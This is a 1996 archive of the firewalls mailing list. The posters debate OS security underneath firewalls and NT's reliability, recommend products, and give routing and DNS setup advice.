Feb 7 16:30:23 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA08730 for firewalls-outgoing; Wed, 7 Feb 1996 15:44:24 -0800 (PST) Received: from dg-rtp.dg.com (dg-rtp.rtp.dg.com [128.222.1.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id PAA08717 for ; Wed, 7 Feb 1996 15:44:17 -0800 (PST) Received: from tsgops.rtp.dg.com by dg-rtp.dg.com (5.4R3.10/dg-rtp-v02) id AA27728; Wed, 7 Feb 1996 18:43:26 -0500 Received: by tsgops.rtp.dg.com (5.4R3.10/200.8.1.3) id AA05372; Wed, 7 Feb 1996 18:43:22 -0500 From: spencerj@dg-rtp.dg.com (Jon Spencer) Message-Id: <9602072343.AA05372@tsgops.rtp.dg.com> Subject: Re: Most Secure Unix? To: weber@iez.com (Rolf Weber) Date: Wed, 7 Feb 1996 18:43:21 -0500 (EST) Cc: spencerj@dg-rtp.dg.com, firewalls@greatcircle.com In-Reply-To: <9601311230.AA16241@spibm02> from "Rolf Weber" at Jan 31, 96 01:30:08 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ... > > So, if a firewall that only protects you against outsiders works perfectly, > > you might reduce your risk by 10%. Won't you feel nice and warm and fuzzy!? > > yes, i feel :-) > if the firewall is properly configured, even insiders can't break the > firewall's security. I think perhaps my point wasn't made clearly. The firewall can only be as good as the OS on which it exists. If your firewall is an application on top of an OS, I can break the firewall by breaking the OS. > > > > > Another problem with firewalls being an application is that the firewall > > then does not really provide much protection for WWW sites. Since you > > can't trust the WWW software to run on the firewall (because you can't > > trust the OS), you must either put the WWW server inside of or outside of > > the firewall. If it is outside, then there is no protection for the WWW > > server (and I am certain that we all know of the home pages that have been > > altered by hackers). If the WWW server is on the inside, then you must > > open a hole for anonymous users in the firewall, thus greatly reducing or > > eliminating any security it might have afforded you. > > how could a firewall protect a WWW server? impossible! > the only 'secure' solution is to place it outside and insure this host as > good as possible. Well, "impossible" is a very big word to use! Especially, since this is exactly what we have. If your assumption is that the firewall is an application, then I do agree with you. That is why the functions of a firewall need to be a base component of a high assurance OS (so you know that they work). Then you run the WWW server on that OS, and you (apparently) have the impossible. :-) > > > > > Bottom line is that the firewall is COMPLETELY dependent upon the security > > provided by the OS for its own security - The firewall can be no more > > secure. If I can break into the OS, the firewall is mine to mangle. More > > on thsi below. > > > > [snip] > > > > Jon F. Spencer spencerj@rtp.dg.com (uunet!rtp.dg.com!spencerj) > > Data General Corp. Phone : (919)248-6246 > > 62 T.W. Alexander Dr, MS #119 FAX : (919)248-6108 > > Research Triangle Park, NC 27709 Office RTP 121/9 > > > on a typical firewall, there only runs: > -the kernel, i never heard of any breakin with the help of a kernel bug > -a few harmless services such as inetd > -the firewall software, often known, sometimes proven to be good > i trust this stuff, but not the configuration of the firewall, even not mine. > if you want a better security as such one, it's surely *not* your OS, it's > simply not to connect at all. > i don't know if your OS is more or less secure as mine. but, IMHO, it doesn't > matter. human failure, that's the point you have to take care. > > rolf It does matter. And so does limiting the effects of human failure, which will always be present. When you make a human SUPER user, you have amplified that users mistakes. So here is one path to travel to limit human mistakes. But this is not the place for a tutorial on how to deal with the REAL risks of a computing environment. Suffice it to say that if you don't deal with them, your firewall won't work, your home page will be violated, and termites will eat your mouse pad. That is why I reassert that if your base OS (including the admin environment) is not high assurance and does not deal with the real threats, your firewall is not very good. Jon From firewalls-owner Wed Feb 7 16:53:45 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA12762 for firewalls-outgoing; Wed, 7 Feb 1996 16:47:24 -0800 (PST) Received: from alpha2000.tech-comm.com (ns.tech-comm.com [204.251.171.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id QAA12755 for ; Wed, 7 Feb 1996 16:47:20 -0800 (PST) Received: by alpha2000.tech-comm.com; (5.65/1.1.8.2/05Jun95-1217PM) id AA30663; Wed, 7 Feb 1996 18:46:42 -0600 Date: Wed, 7 Feb 1996 18:46:42 -0600 From: Dick Brooks Message-Id: <9602080046.AA30663@alpha2000.tech-comm.com> To: Firewalls@GreatCircle.COM, pcuser@slip67-241.ny.us.ibm.net Subject: Re: Firewalls Product Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You can find out about IBM's Secure Network Gateway at: http://www.raleigh.ibm.com/sng/sngover.html We used IBM's firewall at one of our customers. It seems to be a high quality product at a reasonable price ($9,999) Dick Brooks dick@tech-comm.com Chief Technical Officer Tel. 205-250-8054 TECH-COMM Inc. WWW URL: http://www.tech-comm.com/ THE ONLY COMPANY OFFERING VISA CERTIFIED INTERNET CREDIT CARD PROCESSING SW From firewalls-owner Wed Feb 7 17:56:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id QAA13148 for firewalls-outgoing; Wed, 7 Feb 1996 16:52:34 -0800 (PST) Received: from taz.nda.com ([206.0.206.200]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id QAA13116 for ; Wed, 7 Feb 1996 16:52:24 -0800 (PST) Received: (from kovar@localhost) by taz.nda.com (8.7.3/8.7.3) id QAA14547; Wed, 7 Feb 1996 16:52:27 -0800 (PST) From: David Kovar Message-Id: <199602080052.QAA14547@taz.nda.com> Subject: Re: fw-1 and smapd To: nlehrer@usia.gov (Lehrer Neil) Date: Wed, 7 Feb 1996 16:52:26 -0800 (PST) Cc: firewalls@GreatCircle.COM In-Reply-To: <2C1D19310136C8D1@usia.gov> from "Lehrer, Neil" at Feb 7, 96 05:44:07 pm X-Mailer: ELFrom firewalls-owner Thu Feb 8 02:39:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA13430 for firewalls-outgoing; Thu, 8 Feb 1996 02:36:04 -0800 (PST) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA13425 for ; Thu, 8 Feb 1996 02:36:00 -0800 (PST) Message-Id: <199602081036.CAA13425@miles.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA266594928; Thu, 8 Feb 1996 21:22:08 +1100 From: Darren Reed Subject: Re: 0.0.0.0 address on LAN To: gaus@znanost.hr (Damir Rajnovic) Date: Thu, 8 Feb 1996 21:22:08 +1100 (EDT) Cc: firewalls@GreatCircle.COM In-Reply-To: <199602080918.KAA17830@hvar.mzt.hr> from "Damir Rajnovic" at Feb 8, 96 10:18:27 am X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Damir Rajnovic, sie said: > > Hello, > > Someone ask who produce 0.0.0.0 ip address, answer is Win95 (and NT > maybe - don't have it around so can't be shure). Here is excerpt: > > Client: 0.0.0.0 (null) Server 255.255.255.255 (broadcast) > OpCode 0x01: BOOTREQUEST , MAC Address Type: 1, MAC Address Length: 6 > Hops: 0, XID: 0000AF37, trying since 1024 second(s) > > and that guy have Win95 on his machine. Looks like DHCP trying to work. Check the configuration of the Win95 machine for the DHCP setup. darren From firewalls-owner Thu Feb 8 03:24:49 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA14974 for firewalls-outgoing; Thu, 8 Feb 1996 03:06:09 -0800 (PST) Received: from cleese.apana.org.au (dotat-gw.apana.org.au [203.14.159.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA14946 for ; Thu, 8 Feb 1996 03:05:41 -0800 (PST) Received: (from newton@localhost) by cleese.apana.org.au (8.7.1/8.7) id VAA06734 for firewalls@greatcircle.com; Thu, 8 Feb 1996 21:40:07 +1030 (CST) Date: Thu, 8 Feb 1996 21:40:07 +1030 (CST) From: Mark Newton Message-Id: <199602081110.VAA06734@cleese.apana.org.au> To: firewalls@greatcircle.com Subject: The "ULTIMATELY secure firewall" web page Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I have a need to point out some network security problems to an acquaintance, and thought it'd be effective if I illustrated some of them my pointing him at "The ULTIMATELY secure firewall" page on http://www.iwi.com/pubs/A1firewall.htm. Unfortunately, it seems to have disappeared :-( Can anyone offer me a pointer to the page? Thanks in advance, - mark -------------------------------------------------------------------- I tried an internal modem, newton@cleese.apana.org.au but it hurt when I walked. Mark Newton ----- Voice: +61-8-3732429 --------------- Data: +61-8-3736006 ----- From firewalls-owner Thu Feb 8 03:38:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA16054 for firewalls-outgoing; Thu, 8 Feb 1996 03:23:55 -0800 (PST) Received: from amcada.amc.uva.nl (amcada.amc.uva.nl [145.18.204.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id DAA16041 for ; Thu, 8 Feb 1996 03:23:41 -0800 (PST) From: F.Wetzels@amc.uva.nl Received: from eland.amc.uva.nl by amc.uva.nl (PMDF V4.3-7 #2498) id <01I0YY4KV9JK8WWF6C@amc.uva.nl>; Thu, 8 Feb 1996 12:22:03 +1 Received: from amchelix.amc.uva.nl by eland.amc.uva.nl (5.x/SMI-5.0) id AA27114; Thu, 8 Feb 1996 12:21:57 +0100 Received: by amchelix.amc.uva.nl (5.x/SMI-5.0) id AA00997; Thu, 8 Feb 1996 12:21:48 +0100 Date: Thu, 08 Feb 1996 12:21:48 +0100 Subject: Re: routing table go through firewall ? To: firewalls@greatcircle.com Message-id: <9602081121.AA00997@amchelix.amc.uva.nl> X-Envelope-to: firewalls@greatcircle.com MIME-version: 1.0 Content-type: text/plain; charset=us-ascii Content-transfer-encoding: 7bit Content-MD5: 15UJU/sKpFbCd3Wir2vc5w== Sender: firewalls-owner@GreatCircle.COM Precedence: bulk fpmw> I am testing our fw-1 and have got a question before fpmw> implementing our secuity. fpmw> I will use dual homed g/w with fw-1 and connect each ends to the internet fpmw> and our internal network. fpmw> fpmw> Our net -- Router ----- F/W ---- Router -- Internet fpmw> | fpmw> BBS Server ... fpmw> The question is that each router can exchange each routing table or not ? fpmw> If can , How it's possible. ? It can. It depends on what you want. Your turn `rip services' on and off. But it's also possible to do this for igrp, bgp and egp. fpmw> Our network person assumes the G/W with F/W must use rip protocol. fpmw> In our case he won't recommend the rip protocol due to it's heavy traffic. I doubt rip producing much traffic. Normally rip tables are spread once in 30 seconds. fpmw> If it is not possible , please explain in detail how to reach to the fpmw> BBS server from the Our net. In case you're *not* using rip or other routing protocol, You should add static routes on your F/W and internal router. I assumed some IP-adresses on the routers and your BBS station: Your net -------- Router ------------ FW -------+------- Router ------ internet aaa.1 bbb.2 bbb.1 ccc.2 | ccc.1 ddd.2 | | ccc.3 BBS On FW: default via ccc.1 your net via bbb.2 On Router: default via bbb.1 You don't need (musn't) to define a routing rule for directly connect subnets. fpmw> If it must use static routing, how to reach internet just with name from our fpmw> net. Our internal DNS server maintains internal names only and Our policy fpmw> is to let Our net users go out without restriction and Internet users fpmw> be prohibited in some extents. `Internet' should be able to locate the name of your net. A nice solution is an external dns and an internal dns. The FW and the two DNS's should be configured that they communicate (forwarding). But internet sees only two or three machines (the DNS + BBS? + FW(ccc.2)?) The FW should be configured such that only DNS request from your external DNS are allowed and vice versa. In this way DNS informatiosn is available but your net remains invisible (you can allow ping and deny telnet and so on) Frank ------------------------------------------------- F.P.M. Wetzels ADIV/CNS D01-319.1 f.wetzels@amc.uva.nl meibergdreef 15 Voice +31 20 5662916 1105 AZ Amsterdam-ZO Fax +31 20 6973181 ------------------------------------------------- From firewalls-owner Thu Feb 8 03:54:05 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id DAA15153 for firewalls-outgoing; Thu, 8 Feb 1996 03:08:31 -0800 (PST) Received: from iez.com (mail.iez.com [194.218.38.3]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id DAA15142 for ; Thu, 8 Feb 1996 03:08:14 -0800 (PST) Received: by iez.com (AIX 3.2/UCB 5.64/4.03) id AA09429; Thu, 8 Feb 1996 12:08:02 +0100 Received: from spibm02(172.16.13.62) by iez.com via smap (V1.3) id sma009425; Thu Feb 8 12:07:56 1996 Received: from iez.com by spibm02 (AIX 3.2/UCB 5.64/4.03) id AA12965; Thu, 8 Feb 1996 12:05:50 +0100 Message-Id: <9602081105.AA12965@spibm02> Received: from inhps-a by iez.com with SMTP (1.37.109.4/16.2) id AA29495; Thu, 8 Feb 96 12:05:48 +0100 Received: by inhps-a (1.38.193.3/16.2) id AA07866; Thu, 8 Feb 96 12:05:46 +0100 From: Rolf Weber Subject: Re: Most Secure Unix? To: spencerj@dg-rtp.dg.com (Jon Spencer) Date: Thu, 8 Feb 1996 12:05:46 +0100 (MEZ) Cc: firewalls@greatcircle.com (firewalls) In-Reply-To: <9602072343.AA05372@tsgops.rtp.dg.com> from "Jon Spencer" at Feb 7, 96 06:43:21 pm X-Mailer: ELM [version 2.4 PL24] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > I think perhaps my point wasn't made clearly. The firewall can only be as > good as the OS on which it exists. If your firewall is an application > on top of an OS, I can break the firewall by breaking the OS. > i never heard of any breakin possible because of a kernel bug. may be i'm wrong, may be it's possible, but i cannot imagine. > > Well, "impossible" is a very big word to use! Especially, since this is > exactly what we have. If your assumption is that the firewall is an > application, then I do agree with you. That is why the functions of a > firewall need to be a base component of a high assurance OS (so you know > that they work). Then you run the WWW server on that OS, and you (apparently) > have the impossible. :-) > i don't trust *no* WWW server on *no* OS. > > It does matter. And so does limiting the effects of human failure, which will > always be present. When you make a human SUPER user, you have amplified > that users mistakes. So here is one path to travel to limit human mistakes. > But this is not the place for a tutorial on how to deal with the REAL risks > of a computing environment. Suffice it to say that if you don't deal with > them, your firewall won't work, your home page will be violated, and > termites will eat your mouse pad. > > That is why I reassert that if your base OS (including the admin environment) > is not high assurance and does not deal with the real threats, your > firewall is not very good. > i fear this will go to an endless discussion... IMHO, it's senseless to discuss which OS is secure and which not. how will you prove it? my company is a softwarehouse, and we are using a lot of different UNIXes. a few years ago, we got a new OS which was announced to be a C2 system. /etc/passwd was owned by 'bin'! every host which appeared in /etc/hosts.equiv could modify it. i had a really great ROTFL and stopped even thinking about security classifications. i know about my configuration, i know how far i can trust it and where the (possible) vulnerabilities are. that's the most important. may be a ''high security UNIX`` is useful on a multiuser system. on a firewall, where root should be the only user, it doesn't hurt, that's all. rolf -- ----------------------------------------- Rolf Weber | All I ask is a chance IEZ AG D-64625 Bensheim | to prove that money ++49-6251-1309-113 | can't make me happy. From firewalls-owner Thu Feb 8 04:39:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19107 for firewalls-outgoing; Thu, 8 Feb 1996 04:25:01 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA19094 for ; Thu, 8 Feb 1996 04:24:53 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19567; Thu, 8 Feb 1996 07:23:59 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0290; Thu, 08 Feb 96 07:24:32 -0500 Message-Id: <9602081224.AA0290@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 68D97D4CC72345E7852562CA0042B92C; Thu, 8 Feb 96 07:24:25 To: security , firewalls-digest From: Warren Moore Date: 8 Feb 96 7:15:10 Subject: Security Policies Made Easy X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My mailer thinks Bruno Mamer said: >Just a small question, last August, "Jim Carroll" talked of the book >"Information Security Policies Made Easy". > >We've decided to buy it but lack references. Does anyone have the editor, >ISBN number ? Not precisely, but this should do: Author: Charles Cresson Wood Publisher: Baseline Software, Sausalito, CA Tel: 415-332-7763 FAX: 415-332-8032 Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Thu Feb 8 04:54:26 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA19316 for firewalls-outgoing; Thu, 8 Feb 1996 04:28:55 -0800 (PST) Received: from ns.gbnet.net (ns.gbnet.net [194.70.126.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id EAA19293 for ; Thu, 8 Feb 1996 04:28:44 -0800 (PST) Received: (from jrg@localhost) by ns.gbnet.net (8.7.3/8.6.12) id MAA01584; Thu, 8 Feb 1996 12:26:33 GMT Date: Thu, 8 Feb 1996 12:26:33 GMT From: James R Grinter Message-Id: <199602081226.MAA01584@ns.gbnet.net> X-Subliminal: H is for Hypertext X-Mailer: Mail User's Shell (7.2.5 10/14/92) To: "Jason L. Haar" Subject: Re: anybody know of any vulnerabilities with "echo" Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu 8 Feb, 1996, "Jason L. Haar" wrote: >I wonder, this smells heavily of the "Harverst cache Web server". >Harvest uses some pretty wild checks on upstream web sites to see if >they're up or not - the default is to "ping" the host using UDP echo >packets - that could be what you're seeing. > >Of course, it goes without saying that such sites shouldn't set up such >things without ASKING those sites first... The reason it can be configured to send those UDP packets (but *isn't* by default) is to attempt to determine if it will be quicker to fetch the file from source rather than going through its cache hierarchy. If you don't want people to be able to retrieve things quickly from your web server where possible... James. From firewalls-owner Thu Feb 8 05:23:53 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA20306 for firewalls-outgoing; Thu, 8 Feb 1996 04:45:50 -0800 (PST) Received: from cbisgate.cbis.com (cbisgate.cbis.com [155.90.248.205]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA20280 for ; Thu, 8 Feb 1996 04:45:33 -0800 (PST) Received: from notes.cbis.com by cbisgate.cbis.com (5.x/SMI-SVR4) id AA19939; Thu, 8 Feb 1996 07:44:09 -0500 Received: by notes.cbis.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA0382; Thu, 08 Feb 96 07:44:41 -0500 Message-Id: <9602081244.AA0382@notes.cbis.com> Received: from CBIS with "Lotus Notes Mail Gateway for SMTP" id 9BBFD18CE5F0EF95852562CA0043C751; Thu, 8 Feb 96 07:44:41 To: firewalls-digest From: Warren Moore Date: 8 Feb 96 7:42:42 Subject: I want details!!! Re: NT's TCP/IP stack X-Importance: High Mime-Version: 1.0 Content-Type: Text/Plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996 13:23:28 -0600 (CST), my mailer thinks that Robert Dana said: >One of the most valuable things about forums like this is the potential to >share information that cuts through all the BS that floats around out there in >the form of marketing materials and vendor-biased trade publications. I'm >constantly disappointed about how little valuable knowledge is really posted. >And please- keep your OS religion to yourself. Sure, UNIX is what I'm most >comfortable with for now, but that doesn't change the fact that I have to deal >with NT whether I want to or not. GIVE US FACTS. One small voice of sanity...hooray! Ladies & gents, the vast majority of you who post to this list give all the appearances of really knowing your stuff...which is a great help to those of us who are NOT networking geeks, but some other sort of geek (IBM Mainframe/applications background? Gasp! Durn tootin' younker, and I can still remember coding programs for an IBM 705 in machine language back when men were men and sheep were scared.) Believe it or not, many of us who are responsible for securing our corporations' information would just as soon that Billy Boy would strike his tents and leave...but he won't...and lots and lots of executives who don't know diddley about technology just luv them perty windows, and couldn't spell Eunuchs if they had to. OK, so enter the OS of your choice: ???? SUCKS! Fine. Please tell me why, in some detail. I really *need* to know, to help me try and convince those same executives that maybe, just maybe, NT/OS2 (half-OS?)/WfW/or whatever isn't the right box to place one's eggs in. Thanx... Warren S. Moore, CISSP Information Security Specialist Cincinnati Bell Information Systems Inc. From firewalls-owner Thu Feb 8 05:39:12 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA21554 for firewalls-outgoing; Thu, 8 Feb 1996 05:15:12 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA21549 for ; Thu, 8 Feb 1996 05:15:06 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA18105; Thu, 8 Feb 1996 08:13:56 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma018101; Thu Feb 8 08:13:29 1996 Date: Thu, 8 Feb 1996 08:13:28 -0500 (EST) From: Chris Woods To: "Christopher A. Stewart" cc: Ian Miller , firewalls@GreatCircle.COM Subject: Re: Global broadcasts In-Reply-To: <199602080631.WAA00518@www.mazama.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Wed, 7 Feb 1996, Christopher A. Stewart wrote: > Not very far, it's an illegal address.. Never seen that come over the > internet. But I have seen 0.0.0.0 off the net as a source > address. What client sent that anyhow? I believe it was NetManage's Chameleon. Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Thu Feb 8 05:55:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA23518 for firewalls-outgoing; Thu, 8 Feb 1996 05:49:45 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA23490 for ; Thu, 8 Feb 1996 05:49:34 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id IAA18475; Thu, 8 Feb 1996 08:48:40 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma018473; Thu Feb 8 08:48:39 1996 Date: Thu, 8 Feb 1996 08:48:38 -0500 (EST) From: Chris Woods To: Ed Woodrick cc: firewalls@greatcircle.com Subject: RE: NT's TCP/IP stack In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk It is my opinion that many take NT too seriously. I, too, gave NT a valiant try. I ran an ISP for a couple years, and we tried putting all kinds of services on NT, starting with web servers. Any web server that was hit more than a few times per minute would require a daily reboot. I also set up NT as a router: what a f***ing joke that was! That machine crashed almost hourly if it was recieving any traffic. We had to *lie* to the setup to get it to see that there were 2 ethernet cards in the box. It had network routes in the routing table for some unknown and seemingly arbitrary network which *could not* be removed. I am the type of person who always first assumes that problems like these are due to operator error. However, after bashing through things for days, even weeks, I called the tech support of Microsoft and the vendors who released the software we were using (ORA WebSite, Netscape Commerce Server). They, and MSKB, pointed out that the problems I was having were due to *known bugs* for which they did not have an estimated time of repair. Remote administration was a joke. I had the NT Admin pack installed on my Win95 boxen at the office and at home. Whenever the web server would die (the machine is no longer accepting connections to port 80) I would fire up server manager to try to kill and restart the job from there. Upon trying to kill it NT would say that "There is an error stopping this service, blahblah". It would then say that it was not running, as soon as I tried to restart it, the machine went nuts, swapping like crazy (drive light on *solid*). Running ORA WebSite, I sat on a Netscape client on the same LAN and loaded up a page (normal page, no java, not even any CGI) from that server. Hit "Reload" about 10 times in rapid succession on the client. Server crashed and burned. I couldn't even shut it down cleanly, it was swapping so hard the mouse cursor wouldn't even move. OK, this was about 4 months ago. OK, Microsoft (or O'Reilly, or Netscape, whoever may have been the source of each particular problem I had, there were countless more) may have fixed some of these problems. However, I have been building these servers on *nix boxen for years, and other than the first time setting each up, I have never had a problem that could not be easily eplained by hardware problems (i.e. trying to run innd on a 486, what a joke.). On Wed, 7 Feb 1996, Ed Woodrick wrote: > Jeromie, > > Well so far I haven't heard of anybody cracking through NT. The = > Microsoft Web and FTP sites are using NT and they are continually hacked = > at. NT itself has received C2 security which if nothing else means that = > you should be able to adequately see and log what is going on. > > There are quite a few Internet servers running NT at this point. I think = > most people would be surprised with the number. I have run NT at a = > couple companies and have had no problems with the TCP/IP stack. Most = > problems are with applications that try to install their own winsock.dll = > and those that are only winsock compatible with their own stack. I've = > run quite a bit of Netbios over TCP/IP with no problems. > > Let me put it this way, Win95 got a really bad rap when a backdoor was = > found on it, and Win95 really doesn't have security. I would highly = > expect that if NT had been compromised, that it would be front page Wall = > Street News. > > Ed Woodrick > EDCOM > > ---------- > From: jeromie@garrison.com[SMTP:jeromie@garrison.com] > Sent: Tuesday, February 06, 1996 8:03 PM > To: firewalls@greatcircle.com > Subject: NT's TCP/IP stack > > As we have all seen in the last few weeks, there have been several > people who have been ragging on Windows NT TCP/IP stack. I would like = > to hear > some comments on real problems that have been detected. I have looked = > around > the net, although no hard-fact information could I find. NT appears to = > have > some good qualities, ease-of-use, although I am unsure about several = > things. > > The integrity of the OS. Nobody can test it well. Who's to say what = > holes are > under the hood that nobody has a good chance to look at. > > The TCP/IP stack has been said to have problems. > > They are not a security company, therefore I am very unwilling to assume = > they > have done the proper testing for security purposes. For that matter, I = > am=20 > unwilling to assume the product isn't full of "Microsoft Features" that = > are > undocumented.. > > I would be very interested in hearing about these issues.=20 > > Jeromie Jackson > Director of Technology > Garrison Associates > jeromie@garrison.com > > Chris Woods Systems Administrator cjwoods@paladin.com Paladin Computing Solutions 617-273-4226 http://www.paladin.com/chris/ Want the government to control what you are allowed to read and see? "Why, NO!", you say? See http://www.eff.org/blueribbon.html From firewalls-owner Thu Feb 8 06:07:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA21976 for firewalls-outgoing; Thu, 8 Feb 1996 05:23:09 -0800 (PST) Received: from faui45.informatik.uni-erlangen.de (faui45.informatik.uni-erlangen.de [131.188.2.45]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA21954 for ; Thu, 8 Feb 1996 05:22:35 -0800 (PST) Received: from faui01.informatik.uni-erlangen.de (root@faui01.informatik.uni-erlangen.de [131.188.2.1]) by uni-erlangen.de with ESMTP id OAA03145 (8.6.12/7.4f-FAU);; Thu, 8 Feb 1996 14:19:52 +0100 Received: from gundel (tnsturm@faui04g.informatik.uni-erlangen.de [131.188.63.16]) by cip.informatik.uni-erlangen.de with SMTP id OAA28617 (8.6.12/7.4h-FAU);; Thu, 8 Feb 1996 14:19:07 +0100 Message-ID: <3119F849.167EB0E7@cip.informatik.uni-erlangen.de> Date: Thu, 08 Feb 1996 14:19:05 +0100 From: Torsten Sturm Organization: CSD, Univ. Erlangen-Nuernberg, Germany X-Mailer: Mozilla 2.0 (X11; I; SunOS 4.1.3 sun4m) MIME-Version: 1.0 To: Eduardo Torres CC: firewalls@greatcircle.com Subject: Re: DNS for NT References: <199602071037.AA18039@server1.startel.com.ar> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Eduardo Torres wrote: > > -- [ From: Eduardo Torres * EMC.Ver #2.5.02 ] -- > > Can anyone recommend a good DNS solution for NT? There is a direct and nonlimited port of the actual BIND package, very stable, just as the unix thing, and for free... It is maintained by _________________________________________________________________________ Larry Kahn __ __ __ __ Senior Software Engineer kahn@drcoffsite.com / \ / \ / \ / \ Dynamics Research Corp. ____________________/ __\/ __\/ __\/ __\_____________________________ ___________________/ /__/ /__/ /__/ /________________________________ | / \ / \ / \ / \ \____ |/ \_/ \_/ \_/ \ o \ \_____/--< (TALK/WEBTALK: larry@ambra.drcoffsite.com) (FINGER: .site@ambra.drcoffsite.com for PGP public key) _________________________________________________________________________ Please ask him to get his ftp-server. HTH Torsten -- __________________________________________________________________ http://wwwcip.informatik.uni-erlangen.de/user/tnsturm/index.html From firewalls-owner Thu Feb 8 06:41:30 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA26072 for firewalls-outgoing; Thu, 8 Feb 1996 06:33:51 -0800 (PST) Received: from mailhost1.postnet.se (mailhost1.postnet.se [194.14.20.72]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA26040 for ; Thu, 8 Feb 1996 06:33:34 -0800 (PST) Received: (from adm@localhost) by mailhost1.postnet.se (8.7/8.7) id PAA02405 for ; Thu, 8 Feb 1996 15:27:29 +0100 (MET) X-Authentication-Warning: mailhost1.postnet.se: adm set sender to using -f Received: from unknown(193.44.52.150) by mailhost1 via smap (V1.3) id sma002400; Thu Feb 8 15:27:15 1996 Message-ID: <3119743F.7522@mailbox.postnet.se> Date: Thu, 08 Feb 1996 04:55:43 +0100 From: Per Josefsson Organization: PostNet AB X-Mailer: Mozilla 2.0 (Win16; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Risk for session hijacknig Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk My need is to let users upload files with ftp, those files have to be = secrets for say two month. It seems that a common precaution is to use one time passwords but it = seems to me as the opinion of this mailing list states that it isn=92t = enough. Does anyone have a opinion about the risk one expose him self for, if = allowing inbound sessions throng a firewall. I think that there isn=92t a = absolutely secure solution even strong cryptography are breakable (if You = have the time (and the plaintext)). How long would it take to take over a = ISP=92s router and install software to take over my users sessions. = Regards = Per Josefsson From firewalls-owner Thu Feb 8 07:24:15 1996 Received: 